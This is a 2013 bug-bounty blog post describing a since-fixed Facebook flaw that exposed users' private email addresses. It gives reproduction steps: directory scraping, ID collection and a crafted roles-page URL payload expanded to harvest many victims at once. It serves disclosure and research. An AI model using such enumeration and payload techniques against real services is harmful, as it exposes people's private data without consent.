Saturday, July 20, 2013

Hi, For this post, I’ll be talking about how I disclose the Private Primary Email Address of any Facebook Account. With no user interaction. Enjoy.

This bug was reported to Facebook Security Team, fixed immediatelyLast month, I found a vulnerability in Facebook Developer Application Roles Page which allowed me to disclose the primary Facebook email address even if the victim set the email address privacy to "Only Me"Steps to Reproduce1. Grab profile links of all facebook users from Facebook People Directory i.e http://www.facebook.com/directory/people/2. Collect Numerical Facebook ID for each Profile from facebook Graph API i.e http://graph.facebook.com/sdfsdfsdafd.sdfdsafsdfds where extracted user ID is 1000062401206523. Block victim Facebook Account4. Create Facebook Application -> Go to Settings -> Developer Roles 5. Final payload for this vulnerability looks like this:https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID

Nevertheless, you can obtain multiple email address by adding more parameters

https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID1&unverified_groups[2][0]=VICTIM_UID2&unverified_groups[3][0]=VICTIM_UID3&unverified_groups[4][0]=VICTIM_UID4&unverified_groups[5][0]=VICTIM_UID5&unverified_groups[6][0]=VICTIM_UID6&unverified_groups[7][0]=VICTIM_UID7&unverified_groups[8][0]=VICTIM_UID8&unverified_groups[9][0]=VICTIM_UID9&unverified_groups[10][0]=VICTIM_UID10and so forth...

Dumping Like a Boss ;)

Just reported this issue and one hour later Facebook Security Team response my initial report

LoL! ;)

At exactly 8:26AM the vulnerability was finally fixed

Final fix: 5 hours after initial reportFacebook was pretty fast to address this issue and resolved this within hours. Facebook Security team awarded this bug with $4500.

Facebook WhiteHat Card, baby!

I appreciate the opportunity to preserve my skills and gain some more experience. Thank you Facebook security team.